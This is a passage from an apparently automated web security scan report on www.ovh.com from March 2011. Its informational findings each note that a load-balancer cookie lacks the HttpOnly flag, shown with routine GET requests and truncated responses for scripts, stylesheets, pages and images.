Expires: Sat, 05 Mar 2011 16:15:32 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 973

/*
Script: Core.js
Extends mootools.

Copyright:
Copyright (c) 2008 OVH. All rights reserved.
*/

//
// display tools
//

function displayMessage(msg)
{
new Element("div", {

...[SNIP]...

3.50. http://www.ovh.com/fr/js/Logger.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/Logger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/Logger.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "6a18-13f4-4571924f9eb40"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:27 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 17 Sep 2008 15:30:13 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 5108

/*
Script: Logger.js
Logger system.

Examples:
logger.setLevel(4); // enable logger to the most verbose mode

logger.debug('hello world'); // debug

...[SNIP]...

3.51. http://www.ovh.com/fr/js/ajax-lib-core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/ajax-lib-core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/ajax-lib-core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "6a19-2efd-44da66c41bcc0"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:33 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 20 May 2008 09:51:23 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 12029

/*************************************************************************
* OVH AJAX library
*
* - AJAX framework
* - multi-browser js function abstraction
**************************************
...[SNIP]...

3.52. http://www.ovh.com/fr/js/ajax/domainSuggest.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/ajax/domainSuggest.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/ajax/domainSuggest.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "24ccb-11d0-48ea85016a1a9"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:33 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 25 Aug 2010 16:24:16 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 4560

window.addEvent('domready',function(){if($('domainInput')&&$('content')){domainSuggestInit();checkMouseout.periodical(1000);}});function checkMouseout(){if(!domainSuggestVars.isMouseOver)removeSugges
...[SNIP]...

3.53. http://www.ovh.com/fr/js/calendar.compat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/calendar.compat.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/calendar.compat.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "70ad-8386-46c260927c140"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:27 GMT
Vary: Accept-Encoding
Last-Modified: Fri, 12 Jun 2009 12:42:05 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 33670

// Calendar: a Javascript class for Mootools that adds accessible and unobtrusive date pickers to your form elements <http://electricprism.com/aeron/calendar>
// Calendar RC4, Copyright (c) 2007 Aeron
...[SNIP]...

3.54. http://www.ovh.com/fr/js/mediabox/mediabox.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/mediabox/mediabox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/mediabox/mediabox.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 03:05:50 GMT
ETag: "1f42f-aea-4882b99ba478f"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:34 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 2794

/* mediaboxAdvanced - white theme */

#mbOverlay {
   position: fixed;
   z-index: 9998;
   top: 0;
   left: 0;
   width: 100%;
   height: 100%;
   background-color: #000;
   cursor: pointer;
}

#mbOverlay.mbOverlayF
...[SNIP]...

3.55. http://www.ovh.com/fr/js/mediabox/mediabox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/mediabox/mediabox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/mediabox/mediabox.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "1f433-9a48-4882b99ba8e14"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:34 GMT
Vary: Accept-Encoding
Last-Modified: Fri, 04 Jun 2010 03:05:50 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 39496

/*
   mediaboxAdvanced v1.2.0 - The ultimate extension of Slimbox and Mediabox; an all-media script
   updated 2010.01.24
   (c) 2007-2009 John Einselen <http://iaian7.com>
       based on
   Slimbox v1.64 - The u
...[SNIP]...

3.56. http://www.ovh.com/fr/js/mootools-core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/mootools-core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/mootools-core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "22af6-104ee-49b3bbf96d6fa"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 01 Feb 2011 17:20:26 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 66798

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.5",build:"008d
...[SNIP]...

3.57. http://www.ovh.com/fr/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/mootools-more.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/mootools-more.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "22afa-b18c-49b3bbf96f4a4"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:28 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 01 Feb 2011 17:20:26 GMT
Content-Type: application/javascript
Content-Language: fr
Content-Length: 45452

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...

3.58. http://www.ovh.com/fr/js/slider/_class.noobSlide.packed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/js/slider/_class.noobSlide.packed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/js/slider/_class.noobSlide.packed.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 02 Sep 2010 13:34:57 GMT
ETag: "25818-9f2-48f46e156e142"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:34 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 2546

var noobSlide=new Class({initialize:function(a){this.items=a.items;this.mode=a.mode||'horizontal';this.modes={horizontal:['left','width'],vertical:['top','height']};this.size=a.size||240;this.box=a.bo
...[SNIP]...

3.59. http://www.ovh.com/fr/produits/dedies.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/dedies.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/produits/dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Sat, 05 Mar 2011 16:00:06 GMT
ETag: "215605-15853-49dbe5b3b3324"
Accept-Ranges: bytes
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:34 GMT
Vary: Accept-Encoding
Age: 16
Content-Type: text/html; charset=utf-8
Content-Length: 48349

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Anciennes Offres des Se
...[SNIP]...

3.60. http://www.ovh.com/fr/produits/gameplan.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/gameplan.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/produits/gameplan.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Location: http://www.ovh.com/fr/produits/dedies.xml
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ovh.com/fr/p
...[SNIP]...

3.61. http://www.ovh.com/fr/produits/offres_dedies.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/offres_dedies.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/produits/offres_dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Sat, 05 Mar 2011 16:00:06 GMT
ETag: "7efbe-1c5-49dbe5b3b9519"
Accept-Ranges: bytes
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:27 GMT
Vary: Accept-Encoding
Age: 4
Content-Type: text/html; charset=utf-8
Content-Length: 63809

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Offres d'h..bergement d
...[SNIP]...

3.62. http://www.ovh.com/fr/themes/10/bars.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/bars.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/bars.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c69-2024-49ce16a9e9c7b"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 8228

/* ----------------------------*/
/* ------- TELECOM BAR --------*/
/* ----------------------------*/

#tel_nav {
background:url('../../images/bars/telecom/bar.jpg') no-repeat;
width:960px;
...[SNIP]...

3.63. http://www.ovh.com/fr/themes/10/dedicated.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/dedicated.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/dedicated.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118676-1f81-4882b4cc1ba01"
Accept-Ranges: bytes
Content-Length: 8065
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:08 GMT
Age: 1779
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.........................................................)...................................
...[SNIP]...

3.64. http://www.ovh.com/fr/themes/10/dedicated_top.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/dedicated_top.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/dedicated_top.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 14 Sep 2010 13:45:27 GMT
ETag: "216d2e-d0aa-490386ceff1a1"
Accept-Ranges: bytes
Content-Length: 53418
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1788
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.65. http://www.ovh.com/fr/themes/10/footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/footer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/footer.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c5f-2cb-49ce16a9e3ac5"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 715

/* ----------------------------- */
/* ---------- Footers ---------- */
/* ----------------------------- */
#footer {
text-align : center;
width: 989px;
display: block;
margin: 0 a
...[SNIP]...

3.66. http://www.ovh.com/fr/themes/10/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/header.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/header.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "2b8c45-20f6-49ce16a9d8e37"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
Content-Type: text/css
Content-Language: fr
Content-Length: 8438

.../* CSS Document */

/* --------------- */
/* --- TOP MENU --- */
/* --------------- */

#header {
margin: 0 auto;
padding: 0;
   text-align: left;
   width: 989px;
/* h
...[SNIP]...

3.67. http://www.ovh.com/fr/themes/10/index.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/index.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

